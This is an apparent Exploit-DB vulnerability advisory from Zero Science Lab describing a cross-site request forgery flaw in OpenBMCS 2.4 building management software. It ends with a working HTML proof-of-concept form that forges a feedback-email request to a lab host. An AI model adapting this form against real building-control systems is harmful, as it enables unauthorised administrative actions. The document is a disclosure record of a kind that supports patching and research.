OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)

# Exploit Title: OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)
# Exploit Author: LiquidWorm
# Date: 26/10/2021

OpenBMCS 2.4 CSRF Send E-mail


Vendor: OPEN BMCS
Product web page: https://www.openbmcs.com
Affected version: 2.4

Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
           Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
           Apache/2.4.41 (Ubuntu)
           Apache/2.4.25 (Debian)
           nginx/1.16.1
           PHP/7.4.3
           PHP/7.0.33-0+deb9u9


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5691
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5691.php


26.10.2021

--


<html>
  <body>
    <form action="https://192.168.1.222/core/sendFeedback.php" method="POST">
      <input type="hidden" name="subject" value="FEEDBACK%20TESTINGUS" />
      <input type="hidden" name="message" value="Take me to your leader." />
      <input type="hidden" name="email" value="lab@zeroscience.mk" />
      <input type="submit" value="Send" />
    </form>
  </body>
</html>